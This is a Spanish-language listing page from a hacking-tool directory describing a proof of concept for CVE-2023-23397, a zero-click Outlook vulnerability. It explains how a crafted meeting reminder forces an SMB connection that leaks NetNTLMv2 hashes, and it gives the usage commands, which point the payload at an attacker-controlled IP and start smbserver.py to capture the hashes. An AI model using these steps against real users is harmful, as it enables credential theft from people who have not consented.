Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-23397 — Simple PoC de la vulnerabilidad CVE-2023-23397 con el payload enviado por correo electrónico. | Kitploit
Herramientas/GitHubGitHub/trackflaw/cve-2023-23397
Herramientas de PhishingAtaques de ContraseñasGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónSeguridad de Correo Electrónico
GitHubtrackflaw/cve-2023-23397

CVE-2023-23397

Simple PoC de la vulnerabilidad CVE-2023-23397 con el payload enviado por correo electrónico.

Ver Repositorio
13228hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-23397

PoC simple y sucio de la vulnerabilidad CVE-2023-23397 que afecta al cliente pesado de Outlook.

Descripción

Outlook sufre de una falta de control sobre la entrada del usuario que permite configurar el sonido de una reunión y recordatorio de cita. De hecho, un atacante puede forzar a una víctima a realizar una conexión a su servidor sin ninguna manipulación por parte del usuario (vulnerabilidad de cero clics).

Un atacante que explota esta vulnerabilidad obtiene un resumen NetNTLMv2 basado en la contraseña del usuario atrapado a través de una solicitud SMB. La solicitud se activa tan pronto como el correo llega a la bandeja de entrada.

¿Qué hace el PoC?

  1. Genera un payload .msg.
  2. Lo envía por correo electrónico con un servidor SMTP personalizado.

Uso

En una sesión :

root@kitploit:~
python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

En una segunda sesión (smbserver o responder como quieras).

root@kitploit:~
smbserver.py -smb2support SHARE .

Demo (PoC manual)

poc

Video explicativo (en francés)

RÉCUPÉRER des mots de passe avec Microsoft OUTLOOK #CVE-2023-23397

Artículo original

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

Descargar herramienta